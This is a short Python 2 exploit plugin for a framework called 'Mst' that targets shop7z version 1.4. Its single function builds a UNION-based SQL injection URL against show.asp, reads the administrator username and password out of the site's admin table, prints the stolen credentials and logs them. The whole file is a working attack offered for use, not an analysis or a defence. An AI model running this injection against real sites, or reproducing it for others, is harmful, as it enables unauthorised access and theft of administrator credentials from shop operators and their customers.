
# -*- coding: utf-8 -*-
'''Mst=>exploit=>plugin'''
class mstplugin:
	'''shop7z_v1.4_Sqlinject'''
	infos = [
        ['Plugin','shop7z_v1.4_Sqlinject'],
        ['Author','demon&roker'],
        ['Update','2013/10/29'],
        ['Site','http://www.dawner.info'],
        ]
	opts  = [
        ['URL','localhost','Target URL'],
        ['PATH','/','CMS Path'],
        ['PORT','80','Target Port']
        ]
	def exploit(self):
            	url    = fuck.urlformate(URL,PORT,PATH)
        	get_pass    = 'show.asp?pkid=4820%20and%201%20=%202%20union%20select%201,2,3,4,5,6,7,s_user,9,10,11,12,s_pwd,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%20from%20admin'
        	url    = url + get_pass
		try:
            		color.cprint("[+] Sending exp ..",YELLOW)
           		res= fuck.urlget(url).read()
            		ok = fuck.find(r'>\w+<',res)[0]
			k = fuck.find(r'>\w+\s<',res)[0]
            		ok = ok[1:-1]
			k = k[1:-1]
            		color.cprint("[*] Exploit Successful !",GREEN)
            		color.cprint("[*] user:%s"%ok,GREEN)
			color.cprint("[+] pass:%s"%k,BLUE)
			fuck.writelog("shop7z)1.4_sqli",URL+"::"+ok+"::"+k)
               	except Exception,e:
            		color.cprint("[!] Exploit False ! CODE:%s"%e,RED)

			




